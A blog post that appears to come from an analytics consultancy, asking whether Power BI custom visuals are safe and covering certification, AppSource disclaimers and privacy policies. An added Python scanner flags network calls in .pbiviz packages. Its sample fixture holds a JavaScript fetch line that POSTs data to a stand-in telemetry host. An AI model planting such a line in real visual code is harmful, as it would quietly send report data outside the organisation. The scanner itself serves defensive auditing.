Are Power BI’s Custom Visuals Safe?

Hey there,
I hope the new normal is treating you well there.

Yeah so, whenever a BI expert thinks of making an out-of-the-box impact through visualizations, Custom Visuals are one of the big ideas that come to mind.

Are Custom Visuals really safe???

Data is everything in today’s tech-savvy industry. One untrusted source is enough to expose all the information, whether it is the customers’ data or the company’s internal data.


Before proceeding to their security, let’s understand what the heck a custom visual is!

“Custom visuals are created by developers using the custom visuals SDK. Developers use JavaScript libraries such as jQuery, D3, R-language scripts, HTML5, and CSS3, etc. to create custom visuals from scratch. Once a custom visual is ready, it is then tested and published to the marketplace.”

They allow developers to create rich user experiences inside Power BI reports that extend the visualization abilities, the interpretation of the data, and the analytical capabilities of data analysis and business intelligence.

There are 3 ways to deploy custom visuals for use by report builders:

  1. Sharing a .pbiviz file
  2. Adding to the organizational visuals tenant repository
  3. Having users download visuals from the marketplace (AppSource)

When you receive and use a .pbiviz file, you are taking responsibility for assessing data security. When your Power BI admin deploys a custom visual to the organizational visuals repository, they are approving the visual for use inside your organization.

If you are using visuals from the marketplace, you will need to check the information provided about data privacy, and it’s not all that straightforward at the moment.

Certified Visuals

One thing that makes understanding data privacy in custom visuals easier is the designation of a certified custom visual. One of the requirements for certification is “Does not access external services or resources, including but not limited to, no HTTP/S or WebSocket requests go out of Power BI to any services.”
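When a .pbiviz file is shared with you directly, the requirement above suggests a first-pass check you can run yourself. The following is an added example, not code from the original post or from Microsoft: it opens the package as a ZIP archive and searches every member for HTTP/S and WebSocket API use and hard-coded remote URLs. The sample package layout, the `telemetry.example.invalid` host, and all function names are constructed for illustration.

```python
import io
import json
import re
import zipfile

# Network APIs ruled out by the quoted certification requirement, plus remote URLs.
PATTERNS = {
    "fetch": re.compile(r"\bfetch\s*\("),
    "XMLHttpRequest": re.compile(r"\bXMLHttpRequest\b"),
    "WebSocket": re.compile(r"\bWebSocket\b"),
    "url": re.compile(r"\b(?:https?|wss?)://[^\s\"'\\)<>]+"),
}
# XML/SVG namespace identifiers look like URLs but are never fetched.
BENIGN_URL_PREFIXES = ("http://www.w3.org/",)

def iter_strings(node):
    """Yield every string inside a parsed JSON value."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, (dict, list)):
        for value in (node.values() if isinstance(node, dict) else node):
            yield from iter_strings(value)

def audit_pbiviz(data):
    """Return (member, label, match) leads for manual review of a .pbiviz package."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        for name in archive.namelist():
            text = archive.read(name).decode("utf-8", errors="replace")
            try:  # JSON members carry the JavaScript as escaped strings
                chunks = list(iter_strings(json.loads(text)))
            except ValueError:
                chunks = [text]
            for chunk in chunks:
                for label, pattern in PATTERNS.items():
                    for match in pattern.finditer(chunk):
                        if not match.group(0).startswith(BENIGN_URL_PREFIXES):
                            findings.append((name, label, match.group(0)))
    return findings

def build_sample():
    """Constructed package for the demo; layout and contents are assumptions."""
    js = ("var ns='http://www.w3.org/2000/svg';"
          "fetch('https://telemetry.example.invalid/c',{method:'POST',body:d});")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("package.json", json.dumps({"visual": {"name": "sample"}}))
        archive.writestr("resources/sample.pbiviz.json", json.dumps({"content": {"js": js}}))
    return buf.getvalue()
```

Hits are leads for manual review, not proof that data leaves the report. Minified or obfuscated code can evade these patterns, so a clean result does not establish that a visual is safe.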

Are the Uncertified Custom Visuals not safe???

Uncertified visuals are not necessarily less secure than certified visuals, but they have not been tested by Microsoft to confirm security. Any random person can create a custom visual, which is pretty cool and also potentially dangerous for data security.

A disclaimer is placed on uncertified custom visuals, but unfortunately it is at the bottom of the visual description.

This is helpful, but there are a couple of problems with it:

  1. This information is at the bottom of the visual description. Once you select a visual from the list, you most likely need to scroll down to see this note.
  2. This is generic, boilerplate language added by AppSource. They are basically saying that it is possible that the visual might send data over the internet. They are not telling you that it definitely does!

How to check if the visual is safe???

If you want to know the data privacy policy of a particular custom visual, you have to find the link in the description in AppSource and go read it.

Custom Radar Chart

Apparently, every custom visual in the marketplace must have an accompanying privacy policy. You can find the link to the privacy policy by looking at AppSource in a browser (rather than within the window in Power BI desktop). The privacy policy is in the left column near the bottom.

But there doesn’t seem to be a standard template for the privacy policy, so you may not find what you are looking for there. For example, the Violin Plot has a very simple and helpful privacy policy.

Violin Plot Privacy Policy

What Have We Learned?

Determining what data is sent externally by a custom visual is not simple. It also helps to look at the privacy policy and the disclaimer from Microsoft. Many visuals are sandboxed and do not communicate externally.

I hope this blog on custom visuals has given you an idea about data privacy. In the end, I would suggest using only the prebuilt visuals in Power BI Dashboard unless you really need a custom visual. If needed, use a trusted certified visual only.

Thank you for your time here.

Happy learning…
😊

Varun Tiwari
Data Analyst
Addend Analytics